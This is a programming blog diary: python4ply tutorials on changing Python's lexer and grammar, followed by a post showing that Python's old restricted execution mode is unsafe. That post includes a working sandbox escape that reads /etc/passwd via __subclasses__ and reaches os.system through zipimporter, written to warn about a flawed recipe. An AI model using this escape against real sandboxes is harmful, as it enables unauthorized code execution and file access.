Dalke Scientific Software: More science. Less time. Products

Diary RSS | All of Andrew's writings | Diary archive

Writings from the software side of bioinformatics and chemical informatics, with a heaping of Python thrown in for good measure. Code to taste. Best served at room temperature.

python4ply tutorial, part 3 #

The following is an except from the python4ply tutorial. python4ply is a Python parser for the Python language using PLY and the 'compiler' module from the standard library to parse Python code and generate bytecode for the Python virtual machine.

Creating regular expression pattern objects

Regular expressions are fun. The first contact I had with them was through DOS globbing, where "*.*" matched all files with an extension. Then I started using Unix, and started using Archie, which supported regular expressions. Hmm, that was in 1990. I read the documentation for regexps but I didn't understand them. Instead I mentally translated the glob "?" to "." and the glob "*" to ".*".

Luckily for me I was in college and I took a theory of automata course. I loved that course. It taught me a lot about how to think about computers as what they are - glorified state machines.

Other programmers also really like regular expressions, and languages like Perl, Ruby, and Javascript consider them so important that are given syntax level support. Python is not one of those languages, and someone coming from Ruby, where you can do

# lines.rb
File.open("python_yacc.py").each do |line|
  if line =~ /def (\w+)/
    puts "#{$1}\n"
  end  
end
will probably find the corresponding Python both tedious and (because of the separation between the pattern definition and use) harder to read:
# lines.py
import re

pattern = re.compile(r"def (\w+)")

for line in open("python_yacc.py"):
    m = pattern.match(line)
    if m is not None:
        print m.group(1)
This code is generally considered the best practice for Python. It could be made a bit shorter by using re.match instead of the precompiled pattern, but at the cost of some performance.

I'll give Perl5 regular expressions (as implemented by the 're' module) first-class syntax support for creating patterns. That will shorten the code by getting rid of the "import re" and the "re.compile()" call. Here's how I want the pattern creation to look like

pattern = m/def (\w+)/
This new syntax is vaguely modelled after Perl's. It must start with a "m/" and end with a "/" on the same line. Note that my new syntax might break existing code because
m=12
a=3
i=2
print m/a/i
is already valid.

The new token definition goes before the t_NAME definition, to prevent the NAME from matching first. This token returns a 2-ple of the regular expression pattern as a string, and the flags to pass to re.compile. I need to pass it back as basic types and not a pattern object because the bytecode generation only understands the basic Python types.

import re
_re_flags = {
    "i": re.IGNORECASE,
    "l": re.LOCALE,
    "m": re.MULTILINE,
    "s": re.DOTALL,
    #"x": re.VERBOSE, # not useful in this context
    "u": re.UNICODE,
}
def t_PATTERN(t):
    r"m/[^/]*/[a-z]*"
    m, pattern, opts = t.value.split("/")
    
    flags = 0
    for c in opts:
        flag = _re_flags.get(c, None)
        if flag is None:
            # I could pin this down to the specific character position
            raise_syntax_error(
                "unsupported pattern modifier %r" % (c,), t)
        flags |= flag
    # test compile to make sure that it's a valid pattern
    try:
        re.compile(pattern, flags)
    except re.error, err:
        # Sadly, re.error doesn't include the error position
        raise_syntax_error(err.message, t)
    t.value = (pattern, flags)
    return t


# This goes after the strings otherwise r"" is seen as the NAME("r")
def t_NAME(t):
    r"[a-zA-Z_][a-zA-Z0-9_]*"
    t.type = RESERVED.get(t.value, "NAME")
    return t

This PATTERN will be a new "atom" at the grammar level, which will correspond to a call to re.compile("pattern", options).

def p_atom_13(p):
    'atom : PATTERN'
    pattern, flags = p[1]
    p[0] = ast.CallFunc(ast.Name("_$re_compile"), [ast.Const(pattern),
                                                   ast.Const(flags)])
    locate(p[0], p.lineno(1))

See how I'm using the impossible variable name '_$re_compile'? That's going to be "re.compile" and I'll use the same trick I did with the DECIMAL support and insert the AST corresponding to

from re import compile as _$compile
at the start of the module definition,
def p_file_input_2(p):
    "file_input : file_input_star ENDMARKER"
    stmt = ast.Stmt(p[1])
    locate(stmt, p[1][0].lineno)#, bounds(p[1][0], p[1][-1]))
    docstring, stmt = extract_docstring(stmt)
    stmt.nodes.insert(0, ast.From("re", [("compile", "_$re_compile")], 0))
    p[0] = ast.Module(docstring, stmt)
    locate(p[0], 1)#, (None, None))

I'll test this with a simple program

# pattern_test.py
data = "name: Andrew Dalke   country:  Kingdom of Sweden "
pattern = m/Name: *(\w.*?) *Country: *(\w.*?) *$/i
m = pattern.match(data)
if m:
    print repr(m.group(1)), "lives in", repr(m.group(2))
else:
    print "unknown"
% python compile.py -e pattern_test.py 
'Andrew Dalke' lives in 'Kingdom of Sweden'
%
and to see that it generates byte code
% python compile.py  pattern_test.py
Compiling 'pattern_test.py'
% rm pattern_test.py
% python -c 'import pattern_test'
'Andrew Dalke' lives in 'Kingdom of Sweden'
%

Adding a match operator

These changes make it easier to define a pattern, but not to use it. As another example of (fake?) Perl envy. I'm going to support its "=~" match syntax so that the following is valid:

# count_atoms.py
import time

# Count the number of atoms in a PDB file
# Lines to match looks like:
# ATOM   6312  CB  ALA 3 235      24.681  54.463 137.827  1.00 51.30
# HETATM 6333  CA  MYR 4   1       6.722  54.417  88.584  1.00 50.79
count = 0
t1 = time.time()
for line in open("nucleosome.pdb"):
  if line =~ m/(ATOM  |HETATM)/:
      count += 1
print count, "atoms in", time.time()-t1, "seconds"

This turned out to be very simple. I need a new token for "=~". Most of the simple tokens are defined in "python_tokens.py". I added "EQUALMATCH" in the list of tokens in the place shown here

 ...
PERCENTEQUAL %=
AMPEREQUAL &=
CIRCUMFLEXEQUAL ^=
EQUALMATCH =~

COLON :
COMMA ,
 ...

Note that this will break legal existing code, like

>>> a=~2
>>> a
-3
>>> 
The lexer doesn't need anything else because I've already defined a PATTERN token.

I need to decide the precedence level of =~. Is it as strong as "**" or as weak as "or", or some place in between? I decided to make it as weak as "or", which is defined by the "test" definition. Here's my new "p_test_4" function:

def p_test_4(p):
    'test : or_test EQUALMATCH PATTERN'
    # pattern.search(or_test)
    sym = gensym("_$re-")
    pattern, flags = p[3]
    p.parser.patterns.append((sym, pattern, flags))
    p[0] = ast.Compare(
        ast.CallFunc(ast.Getattr(ast.Name(sym), 'search'), [p[1]], None, None),
        [("is not", ast.Name("None"))])
    locate(p[0], p.lineno(2))

I got the AST definition by looking at

>>> from compiler import parse
>>> parse("pat.search(line) is not None")
Module(None, Stmt([Discard(Compare(CallFunc(Getattr(Name('pat'), 'search'),
[Name('line')], None, None), [('is not', Name('None'))]))]))
>>> 

And that's it! Well, I could add an optimization in this case and move the ".search" outside the loop, but that's an exercise left for the student.

Now I'll put a toe into evil, just to see how cold it is. I'm going to add support for

# get_function_names.py
for line in open("python_yacc.py"):
    if line =~ m/def (\w+)/:
        print repr($1)
That is, if the =~ matches then $1, $2, ... will match group 1, 2. Oh, and while I'm at it, if there's a named group then $name will retrieve it. And '$' will mean to get the match object itself.

To make it work I need some way to do assignment in the expression. Python doesn't really support that except through a hack I don't want to use, so I'll use another hack and change the bytecode generation stage.

I created a new AST node called "AssignExpr" which is like an "Assign" node except that it can be used in an expression. The compiler module doesn't know about it and it's hard to change the code through subclassing, so I patch the compiler and its bytecode generation code so it understands the new node type. These changes are in "compiler_patches.py" and the patches are done when the module is imported. Take a look at the module if you want to see what it does.

It doesn't escape my notice that with AssignExpr there's only a handful of lines needed for support assignment in an expression, like

if line = readline():
    print repr(line)
Before you do that yourself, read the Python FAQ for why Python doesn't support this.

To support the new pattern match syntax I need to make two changes to python_yacc.py. The first is to import the monkeypatch module:

import compiler_patches
then make the changes to the p_test_4 function to save the match object to the variable "$".
def p_test_4(p):
    'test : or_test EQUALMATCH PATTERN'
    # pattern.search(or_test)
    sym = gensym("_$re-")
    pattern, flags = p[3]
    p.parser.patterns.append((sym, pattern, flags))
    p[0] = ast.Compare(
        ast.AssignExpr([ast.AssName("$", "OP_ASSIGN")],
                       ast.CallFunc(ast.Getattr(ast.Name(sym), 'search'),
                                    [p[1]], None, None)),
        [("is not", ast.Name("None"))])
    locate(p[0], p.lineno(2))

Does it work? Try this program, which is based on the Ruby code I started with at the start of this tutorial section, oh so long ago.

# get_function_names.py
for line in open("python_yacc.py"):
    if line =~ m/def (\w+)/:
        # I don't yet have syntax support to get to the special '$'
        # variable so I have to get it from the globals dictionary.
        print repr(globals()["$"].group(1))
% python compile.py -e get_function_names.py
'gensym'
'raise_syntax_error'
'locate'
'bounds'
'text_bounds'
'extract_docstring'
'__init__'
'__init__'
'add_arg'
'add_star_arg'
'p_file_input_1'
'p_file_input_2'
'p_file_input_star_1'
'p_file_input_star_2'
'p_file_input_star_3'
    ...

Sweet!

With a bit more work (described in detail in the tutorial), I changed the parser to allow this Perl/Python fusion syntax.

# get_function_names.py
for line in open("python_yacc.py"):
    if line =~ m/def (?P<name>\w+) *(?P<args>\(.*\)) *:/:
        print repr($1), repr($args)



python4ply tutorial, part 2 #

The following is an except from the python4ply tutorial. python4ply is a Python parser for the Python language using PLY and the 'compiler' module from the standard library to parse Python code and generate bytecode for the Python virtual machine.

Syntax support for decimal numbers

How about something more complicated? Python's "decimal" module is a fixed point numeric type using base 10, which is especially useful for those dealing with money. Here's an obvious limitation of doing base 10 calculations in base 2. I stole it from the decimal documentation.

>>> 1.0 % 0.1
0.09999999999999995
>>> import decimal
>>> d = decimal.Decimal("1.0")
>>> d
Decimal("1.0")
>>> d / decimal.Decimal("0.1")
Decimal("10")
>>> 
The normal way to create a decimal number is to "import decimal" then use "decimal.Decimal". I'm going to add grammar-level support so that "0d12.3" is the same as decimal.Decimal("12.3"). There's a few complications so I'll walk you through how to do this.

I need a new DECIMAL token type that matches "0[dD][0-9]+(\.[0-9]+)?". This allows "0d1.23" and "0D1" and "0d0.89" but not "0d.2" nor "0d6." Feel free to change that if you want. Bear in mind possible ambiguities; does "0d1.x" mean the valid "Decimal('1').x" or the syntax error "Decimal('1.') x". What about "0d1..sqrt()"?

Designing a new programming language really means having to pay attention to nuances like this.

The DECIMAL rule is simple, in part because limitations of what can be saved the byte code means the creation of the decimal object must be deferred until later. Just like with the t_BIN_NUMBER rule, this new t_DECIMAL rule must go before t_OCT_NUMBER so there's no confusion.

def t_DECIMAL(t):
    r"0[dD][0-9]+(\.[0-9]+)?"
    t.value = t.value[2:]
    return t

def t_OCT_NUMBER(t):
    r"0[0-7]*[lL]?"
    t.type = "NUMBER"

If you save this and try it out on the following program

# div.py
print "float", 1.0 % 0.1
print "decimal", 0d1.0 % 0d0.1
you'll see
% python compile.py -e div.py
Traceback (most recent call last):
  File "compile.py", line 76, in <module>
    execfile(args[0])
  File "compile.py", line 43, in execfile
    tree = python_yacc.parse(text, source_filename)
  File "/Users/dalke/src/python4ply-1.0/python_yacc.py", line 2607, in parse
    parse_tree = parser.parse(source, lexer=lexer)
  File "/Library/Frameworks/Python.framework/Versions/2.5/lib/python2.5/site-packages/ply/yacc.py", line 237, in parse
    lookahead = get_token()     # Get the next token
  File "/Users/dalke/src/python4ply-1.0/python_lex.py", line 657, in token
    x = self.token_stream.next()
  File "/Users/dalke/src/python4ply-1.0/python_lex.py", line 609, in add_endmarker
    for tok in token_stream:
  File "/Users/dalke/src/python4ply-1.0/python_lex.py", line 534, in synthesize_indentation_tokens
    for token in token_stream:
  File "/Users/dalke/src/python4ply-1.0/python_lex.py", line 493, in annotate_indentation_state
    for token in token_stream:
  File "/Users/dalke/src/python4ply-1.0/python_lex.py", line 435, in create_strings
    for tok in token_stream:
  File "/Library/Frameworks/Python.framework/Versions/2.5/lib/python2.5/site-packages/ply/lex.py", line 305, in token
    func.__name__, newtok.type),lexdata[lexpos:])
ply.lex.LexError: /Users/dalke/src/python4ply-1.0/python_lex.py:203: Rule 't_DECIMAL' returned an unknown token type 'DECIMAL'
The list of known token type names is given in the 'token' variable, defined at the top of python_lex.py. I'll add "DECIMAL" to the list
tokens = tuple(python_tokens.tokens) + (
    "NEWLINE",

    "NUMBER",
    "NAME",
    "WS",
    "DECIMAL",

    "STRING_START_TRIPLE",
    "STRING_START_SINGLE",
     ....

With that change I get a new error message. Whoopie for me!

% python compile.py -e div.py
Traceback (most recent call last):
  File "compile.py", line 76, in <module>
    execfile(args[0])
  File "compile.py", line 43, in execfile
    tree = python_yacc.parse(text, source_filename)
  File "/Users/dalke/src/python4ply-1.0/python_yacc.py", line 2607, in parse
    parse_tree = parser.parse(source, lexer=lexer)
  File "/Library/Frameworks/Python.framework/Versions/2.5/lib/python2.5/site-packages/ply/yacc.py", line 346, in parse
    tok = self.errorfunc(errtoken)
  File "/Users/dalke/src/python4ply-1.0/python_yacc.py", line 2488, in p_error
    python_lex.raise_syntax_error("invalid syntax", t)
  File "/Users/dalke/src/python4ply-1.0/python_lex.py", line 27, in raise_syntax_error
    _raise_error(message, t, SyntaxError)
  File "/Users/dalke/src/python4ply-1.0/python_lex.py", line 24, in _raise_error
    raise klass(message, (filename, lineno, offset+1, text))
  File "div.py", line 3
    print "decimal", 0d1.0 % 0d0.1
                     ^
SyntaxError: invalid syntax
That's because the parser doesn't know what to do with a DECIMAL. What do you think it should it do? The ast.Const node only takes a string or a built-in numeric value. It doesn't take general Python objects because those can't be marshalled into bytecode.

I'll wait a moment for you to think about it.

Thought enough? No? Okay, just a moment more.

This new token should correspond to making a new Decimal object at that point. You might think you could be more clever than that and create the decimals during module imports, like I will do for the regular expression definitions coming later on in this tutorial. That would make the object creation occur only once, instead of once for each function call or for every time through a loop. But a decimal object depends on a global/thread-local context, and if I move the decimal creation then I might create it in the wrong context.

To make my life easier, I'm going to import the Decimal class as the super seekret module variable "_$Decimal". This is a variable name that can't occur in normal Python (because of the "$") and which is hidden from "... import *" statements (because of the leading "_"). That way the object creation is mostly a matter of calling "_$Decimal(s)" in the right place, which I can only do by constructing the AST myself.

What will that look like? I'll use the compiler package to show what that AST should look like:

>>> import compiler
>>> compiler.parse("from decimal import Decimal as D")
Module(None, Stmt([From('decimal', [('Decimal', 'D')], 0)]))
>>> compiler.parse("Decimal('12.345')")
Module(None, Stmt([Discard(CallFunc(Name('Decimal'),
[Const('12.345')], None, None))]))
>>>

The new DECIMAL token can go anywhere a NUMBER and NAME can go. That's an "atom" in the Python grammar.

atom: ('(' [yield_expr|testlist_gexp] ')' |
       '[' [listmaker] ']' |
       '{' [dictmaker] '}' |
       '`' testlist1 '`' |
       NAME | NUMBER | STRING+)
The last three of these are defined in python_yacc.py as:
def p_atom_9(p):
    'atom : NAME'
    p[0] = ast.Name(p[1])
    locate(p[0], p.lineno(1))#, text_bounds(p, 1))

def p_atom_10(p):
    'atom : NUMBER'
    value, orig_text = p[1]
    p[0] = ast.Const(value)
    locate(p[0], p.lineno(1))#, (p.lexpos(1), p.lexpos(1) + len(orig_text)))

def p_atom_11(p):
    'atom : atom_plus'
    # get the STRING (atom_plus does the string concatenation)
    s, lineno, span = p[1]
    p[0] = ast.Const(s)
    locate(p[0], lineno)#, span)
They are simple because the AST nodes are designed for Python. Nearly every token type and statement type maps directly to an AST node. The "locate" function assigns a line number to each created node, and you can see some of my experimental work also assign a start and end byte location.

Here's the new definition for DECIMAL, which is a bit more complex because I need to call _$Decimal. Remember that I can't simply use an ast.Const containing a decimal.Decimal because the byte code generation only supports strings and numbers.

def p_atom_12(p):
    "atom : DECIMAL"
    decimal_string = p[1]
    p[0] = ast.CallFunc(ast.Name("_$Decimal"),
                        [ast.Const(decimal_string)], None, None)
    locate(p[0], p.lineno(1))

At this point running the code should fail because _$Decimal doesn't exist.

% python compile.py -e div.py
yacc: Warning. Token 'WS' defined, but not used.
yacc: Warning. Token 'STRING_START_SINGLE' defined, but not used.
yacc: Warning. Token 'STRING_START_TRIPLE' defined, but not used.
yacc: Warning. Token 'STRING_CONTINUE' defined, but not used.
yacc: Warning. Token 'STRING_END' defined, but not used.
/Users/dalke/src/python4ply-1.0/python_yacc.py:2473: Warning. Rule 'encoding_decl' defined, but not used.
yacc: Warning. There are 5 unused tokens.
yacc: Warning. There is 1 unused rule.
yacc: Symbol 'encoding_decl' is unreachable.
yacc: Generating LALR parsing table...
float 0.1
decimal
Traceback (most recent call last):
  File "compile.py", line 76, in <module>
    execfile(args[0])
  File "compile.py", line 48, in execfile
    exec code in mod.__dict__
  File "div.py", line 3, in <module>
    print "decimal", 0d1.0 % 0d0.1
NameError: name '_$Decimal' is not defined

Why are the 'yacc:' messages there? PLY uses a cached parsing table for better performance. When it notices a change in the grammar it invalidates the cache and rebuilds the table based on the new grammar. What you're seeing here are the messages from the rebuild.

Why is the exception there? Because the function call uses _$Decimal but that name doesn't exist. Why does it report line 3 even through I only assigned a line number to the ast.CallFunc and not the ast.Name, which is what acutally failed? Because the AST generation code in the compiler module doesn't always assign line numbers so the byte code generation step assumes it's the same as the line number for the previously generated instruction.

For extra credit, why does the following report the error on line 3 instead of line 1?

def p_atom_12(p):
    "atom : DECIMAL"
    decimal_string = p[1]
    p[0] = ast.CallFunc(ast.Name("_$Decimal"),
                        [ast.Const(decimal_string)], None, None)
    locate(p[0], 1)  # Why doesn't this report the error on line 1?

The last bit of magic is to import the Decimal constructor correctly. The root term in the Python grammar is "file_input". (There's another root if you're doing an 'eval'.) One case is for an empty file and the other is for a file that contains statements. The code as distributed looks like this:

def p_file_input_1(p):
    "file_input : ENDMARKER"
    # Empty file
    stmt = ast.Stmt([])
    locate(stmt, 1)#, (None, None))
    p[0] = ast.Module(None, stmt)
    locate(p[0], 1)#, (None, None))

def p_file_input_2(p):
    "file_input : file_input_star ENDMARKER"
    stmt = ast.Stmt(p[1])
    locate(stmt, p[1][0].lineno)#, bounds(p[1][0], p[1][-1]))
    docstring, stmt = extract_docstring(stmt)
    p[0] = ast.Module(docstring, stmt)
    locate(p[0], 1)#, (None, None))
By definition the empty file can't have any Decimal statements in it so I'll only worry about p_file_input_2. But I won't worry much. For instance, for now I won't worry that the file can contain __future__ statements. These must go before any statement other than the doc string. (If you really want to worry about that then feel free to worry. And also worry that in older Pythons "as" and "with" were not reserved words.)

I'll insert the new import statement as the first statement in the created module.

def p_file_input_2(p):
    "file_input : file_input_star ENDMARKER"
    stmt = ast.Stmt(p[1])
    locate(stmt, p[1][0].lineno)#, bounds(p[1][0], p[1][-1]))
    docstring, stmt = extract_docstring(stmt)
    stmt.nodes.insert(0, ast.From("decimal", [("Decimal", "_$Decimal")], 0))
    p[0] = ast.Module(docstring, stmt)
    locate(p[0], 1)#, (None, None))
That's it.

That was it?

Yes, that was it. Want to see it work?

% cat div.py
# div.py
print "float", 1.0 % 0.1
print "decimal", 0d1.0 % 0d0.1
% python compile.py -e div.py
float 0.1
decimal 0.0
% 



python4ply tutorial, part 1 #

The following is an except from the python4ply tutorial. python4ply is a Python parser for the Python language using PLY and the 'compiler' module from the standard library to parse Python code and generate bytecode for the Python virtual machine.

What is it python4ply?

python4ply is a Python parser for the Python language. The grammar definition uses PLY, a parser system for Python modelled on yacc/lex. The parser rules use the "compiler" module from the standard library to build a Python AST and to generate byte code for .pyc file.

You might use python4ply to experiment with variations in the Python language. The PLY-based lexer and parser are much easier to change than the C implementation Python itself uses or even the ones written in Python which are part of the standard library. This tutorial walks through examples of how to make changes in different levels of the system.

If you only want access to Python's normal AST, which includes line numbers and byte position for the code fragements, you should use the _ast module.

Reminiscing, fabrications, and warnings

Back long time ago I had a class assignment to develop a GUI interface using drawpoint and drawtext primitives only. Everything - buttons, text displays, even the mouse pointer itself - was built on those primitives. It gave the strange feeling of knowing that GUIs are completely and utterly fake. There's no there there, and it's only through a lot of effort that it feels real. Those that aren't as old and grizzled as I am might get the same feeling with modern web GUIs. Those fancy sliders and cool UI effects are built on divs and spans and CSS and a lot of hard work. They aren't really there.

This package gives you the same feeling about Python. It contains a Python grammar definition for the PLY parser. The file python_lex.py is the tokenizer, along with some code to synthesize the INDENT, DEDENT and ENDMARKER tags. The file python_yacc.py is the parser. The result is an AST compatible with that from the compiler module, which you can use to generate Python byte code (".pyc" files).

There's also a python_grammer.py file which makes a nearly useless concrete syntax tree. This parser was created by grammar_to_ply.py, which converts the Python "Grammar" definition into a form that PLY can more easily understand. I keep it around to make sure that the rules in python_yacc.py stay correct. You might also find it useful if you want to port the grammar directly to yacc or some similar parser system.

What this means is this package gives you, if you put work into it, the ability to create a Python variant that works on the Python VM, or if you put a lot of work into it (like the Jython, PyPy, and IronPython developers), a first step into making your own Python implementation.

If you think this sounds like a great idea, you're probably wrong. Down this path lies madness. Making a new language isn't just a matter of adding a new feature. The parts go together in subtle ways, and if you tweak the language and someone else tweaks the language a different way, then you quickly stop being able to talk to each other.

Lisp programmers are probably thinking now that this is just a half-formed macro system for Python. They are right. Once you have an AST you can manipulate it in all sorts of ways. But many experienced Lisp programmers will caution against the siren call of macros. Don't make a new language unless you know what dangerous waters you can get into.

On the other hand, it's a lot fun. Someone has to make the new cool langauge for the future so you've got to practice somewhere. And there are a few times when changing things at the AST or code generation levels might make good sense.

Steve Yegge is right when he wrote "When you write a compiler, you lose your innocence."

Getting started

I'll start with the simple thing, to make sure everything works. Create the file "owe_me.py" with the following:

# owe_me.py
amount = 10000000
print "You owe me", amount, "dollars"
To bytecompile it use the provided "compile.py" file. This is similar to "py_compile.py" from the standard library.
% python compile.py owe_me.py
Compiling 'owe_me.py'
% ls -l owe_me.pyc 
-rw-r--r--   1 dalke  staff  165 Feb 17 19:21 owe_me.pyc
%
Running this is a bit tricky because the .pyc file is only used when the file is imported as a module. The easiest way around that is to import the module via a comment-line call.
% python -c 'import owe_me'
You owe me 10000000 dollars
%
(I thought it would be best to use the '-m' option but that seems to import the .py file before the .pyc file. Hmm, I should check into that some more.)

If you want to prove that it's using the .pyc generated by this "compile.py", try renaming the file

% rm owe_me.pyc
% python compile.py owe_me.py
Compiling 'owe_me.py'
% mv owe_me.pyc you_owe_me.pyc
% python -c 'import you_owe_me'
You owe me 10000000 dollars
%
The compile module also supports a '-e' mode, which executes the file after byte compiling it, instead of saving the byte compiled form to a file.
% python compile.py -e owe_me.py
You owe me 10000000 dollars
%

Numbers like 1_000_000 - changing the lexer

Reading "10000000" is tricky, at least for humans. Is that 1 million or 10 million? You might be envious of Perl, which supports using "_" as a separator in a number

% perl
$amount = 10_000_000;
print "You owe me $amount\n";
^D
You owe me 10000000
%

You can change the python4ply grammar to support that. The tokenization pattern for base-10 numbers is in python_lex.py in the function "t_DEC_NUMBER":

def t_DEC_NUMBER(t):
    r'[1-9][0-9]*[lL]?'
    t.type = "NUMBER"
    value = t.value
    if value[-1] in "lL":
        value = value[:-1]
        f = long
    else:
        f = int
    t.value = (f(value, 10), t.value)
    return t

Why do I return the 2-tuple of (integer value, original string) in t.value? The python_yacc.py code contains commented out code where I'm experimenting with keeping track of the start and end character positions for each token and expression. PLY by default only tracks the start position, so I use the string length to get the end position. I'm also theorizing that it will prove useful for those doing round-trip conversions and want to keep the number in its original presentation.

Okay, so change the pattern to allow "_" as a character after the first digit, like this:

    r'[1-9][0-9_]*[lL]?'
then modify the action to remove the underscore character. The new definition is:
def t_DEC_NUMBER(t):
    r"[1-9][0-9]*[lL]?"
    t.type = "NUMBER"
    value = t.value.replace("_", "")
    if value[-1] in "lL":
        value = value[:-1]
        f = long
    else:
        f = int
    t.value = (f(value, 10), t.value)
    return t

To see if it worked I changed owe_me.py to use underscores, and I changed the value to prove that I'm using the new file instead of some copy of the old

# owe_me.py
amount = 20_000_000
print "You owe me", amount, "dollars"
% python compile.py -e owe_me.py
You owe me 20000000 dollars
%

Questions or comments?



python4ply #

python4ply 1.0

python4ply is a Python parser for the Python language. The grammar definition uses PLY, a parser system for Python modelled on yacc/lex. The parser rules use the "compiler" module from the standard library to build a Python AST and to generate byte code for .pyc file.

You might use python4ply to experiment with variations in the Python language. The PLY-based lexer and parser are much easier to change than the C implementation Python itself uses or even the ones written in Python which are part of the standard library. This tutorial walks through examples of how to make changes in different levels of the system

To give you an idea of what it can do, here are some examples from the tutorial:

     # integers with optional underscores separators 
amount = 20_000_000
print "You owe me", amount, "dollars"
      # sytax-level support for decimals
% cat div.py
# div.py
print "float", 1.0 % 0.1
print "decimal", 0d1.0 % 0d0.1
% python compile.py -e div.py
float 0.1
decimal 0.0
% 
      # Perl-like regex creation and match operator
for line in open("python_yacc.py"):
    if line =~ m/def (?P\w+) *(?P\(.*\)) *:/:
        print repr($1), repr($args)

The primary site for python4ply is http://dalkescientific.com/Python/python4ply.html. The package is released under the MIT license.

Download python4ply-1.0.tar.gz or view the tutorial.

  • Questions or comments?


  • Restricted python #

    Long time ago there was the thought that Python could support a restricted execution mode, where untrusted code could be executed with limited capabilities. Quoting from the Python 2.2.3 manual:

    There exists a class of applications for which this "openness'" is inappropriate. Take Grail: a Web browser that accepts "applets,'' snippets of Python code, from anywhere on the Internet for execution on the local system. This can be used to improve the user interface of forms, for instance. Since the originator of the code is unknown, it is obvious that it cannot be trusted with the full resources of the local machine.

    Restricted execution is the basic framework in Python that allows for the segregation of trusted and untrusted code. It is based on the notion that trusted Python code (a supervisor) can create a ``padded cell' (or environment) with limited permissions, and run the untrusted code within this cell. The untrusted code cannot break out of its cell, and can only interact with sensitive system resources through interfaces defined and managed by the trusted code.

    In practice this didn't work out. By the time 2.3 came out the restricted execution documentation said:
    Warning: In Python 2.3 these modules have been disabled due to various known and not readily fixable security holes. The modules are still documented here to help in reading old code that uses the rexec and Bastion modules.
    There were a lot of tricks to get around the problem. Over time the simple ones were patched but the problem is the Python C implementation (and probably the Java and .Net ones) weren't designed with security in mind. It's very hard to retrofit security.

    Some of the restricted environment code stayed in Python. Here's a snippet from the CVS version just before 2.6a1.

            /* rexec.py can't stop a user from getting the file() constructor --
               all they have to do is get *any* file object f, and then do
               type(f).  Here we prevent them from doing damage with it. */
            if (PyEval_GetRestricted()) {
                    PyErr_SetString(PyExc_IOError,
                    "file() constructor not accessible in restricted mode");
                    f = NULL;
                    goto cleanup;
            }
    
    The PyEval_GetRestricted() test checks to see if __builtins__ for the current frame is the same as Python's globals. If not, it's a restricted environment. Here's an example of the same code run in each environment:
    >>> exec """print [x for x in ().__class__.__bases__[0].__subclasses__()
    ...      if x.__name__ == 'file'][0]('/etc/passwd').read()[:60]"""
    ##
    # User Database
    # 
    # Note that this file is consulted whe
    
    
    >>> L = G = dict(__builtins__ = {})
    >>> exec """print [x for x in ().__class__.__bases__[0].__subclasses__()
    ...      if x.__name__ == 'file'][0]('/etc/passwd').read()[:60]""" in L, G
    Traceback (most recent call last):
      File "<stdin>", line 1, in <module>
      File "&tl;string>", line 1, in <module>
    IOError: file() constructor not accessible in restricted mode
    >>> 
    

    Today I saw the recently contributed Python Cookbook Recipe which "create[s] a restricted python function from a string." Sounds nice so I looked at it. It basically uses what's left of the old rexec code, which is know to be untrustworthy for the general case.

    For the person who posted the code it's probably good enough, but the recipe doesn't include the strong warnings I thought were needed. I added a comment, and to strengthen the comment decided to come up with an attack using the default recipe and without using any passed in variables.

    I came close. If I know the location of an egg which has already been loaded and which contains a reference to the 'os' module then I can get access to os.system through the zipimporter type. One such common module is 'configobj'.

    # Example attack code using the zipimport type to get around Python's
    # restricted mode checks.
    
    # Must import this otherwise zipimporter will fail because zlib can't
    # be found.  (Reading another zip file fixes that, but then the import
    # fails because it can't find __import__)
    import configobj
    
    
    attack_code = """
    
    all_types = ().__class__.__bases__[0].__subclasses__()
    file = [x for x in all_types if x.__name__ == "file"][0]
    
    # Prove that I'm in restricted mode, or that I'm running
    # on a non-unix-based machine.  This stop is optional
    try:
        file("/dev/zero")
    except:
        pass
    else:
        assert "Was able to open a file!"
        1/0
    
    zipimport = [x for x in all_types if x.__name__ == "zipimporter"][0]
    
    # Easiest case would be on a system with a python*.zip file
    # because I could import os directly this way.
    
    egg = ("/Library/Frameworks/Python.framework/Versions/2.5/lib/"
           "python2.5/site-packages/configobj-4.4.0-py2.5.egg")
    loader = zipimport(egg)
    configobj = loader.load_module("configobj")
    os = configobj.os
    
    print "system call:", os.system("ls")
    
    """
    
    
    L = G = dict(__builtins__ = {})
    exec attack_code in L, G
    
    This contains comments and some code to verify that I'm really running in restricted mode. Take that out and the attack code is an expression that doesn't need to be exec'ed and which doesn't use any passed in variables.
    [x for x in ().__class__.__bases__[0].__subclasses__()
       if x.__name__ == "zipimporter"][0](
         "/Library/Frameworks/Python.framework/Versions/2.5/lib/"
         "python2.5/site-packages/configobj-4.4.0-py2.5.egg").load_module(
         "configobj").os.system("ls")
    

    I considered reporting this as a bug to the Python maintainers, in case there was thought to slowly patch problems like this, but then noticed Python 3's "NEWS" file says

    - Remove the f_restricted attribute from frames. This naturally leads to the removal of PyEval_GetRestricted() and PyFrame_IsRestricted().
    Goodbye and good riddance. It won't confuse people into thinking it does something useful when it doesn't.



    Log analysis of my website #

    I write these essays in part as a promotional activity. I'm a consultant, and expect people to find out more about what I do through reading what I've written.

    I've wondered if it's been useful, but have put off doing the analysis of my website. At first it was because I didn't have enough essays to do interpretable analysis. And then I just put it off. At the German Chemoinformatics Conference I talked to quite a few people, mostly grad students, who had gotten information from my site. That was enough to make me finally do some analysis.

    I used awstats, chosen based on doing some web searches. I wanted something that could analyze my Apache logs and could generate static pages. There are other tools but since awstats did what I wanted I didn't try anything else.

    So far this year I've had 1.1 million "hits", which corresponds to 330,000 page views. A "hit" includes images, so a page view can have multiple hits because of CSS, images, and other embedded content. Another nearly 500,000 page views comes from web spiders and other identifiably non-people requests. More page requests from robots than people. All told, I use less than 20GB bandwidth per year. I use pair Networks for my hosting. My basic account allows 400GB/month of transfer. I'm not even close.

    Of the robots, Yahoo Slurp pulled down 1.6 GB, MSNBot 810 MB and and Googlebot 290MB. 80MB for Google's RSS reader, 7MB from Bloglines and 5MB from UniversalFeedParser. Of the users, 64.5% use Windows, 17% use Linux, 11.5% use Macs, and jumping over the BSD and Solaris users, a full 88 requests came from an IRIX machine. The browser stats are 45% Firefox, 33.5% IE, 4% each Mozilla and Firefox, 3% Opera.

    Top hit (no surprise) is my RSS feed, viewed 82,000 times this year. Including by aggregators so translate as you wish. Next was my LOLPython page, which wasn't a surprise. I wrote it deliberately because of the then high popularity of lolcats and lolcode. It got 17,500 views. About 1,200 downloads from people who weren't me.

    The next two were surprising. I did a series of lectures for the NBN. These were for the most part graduate students in biology, going into computational biology, who needed more programming training. The page on Javascript validation got 7,300 hits and on threads in Python, with 5,800. My screen scraping was also popular, at 5,600 views.

    Going further down the list:

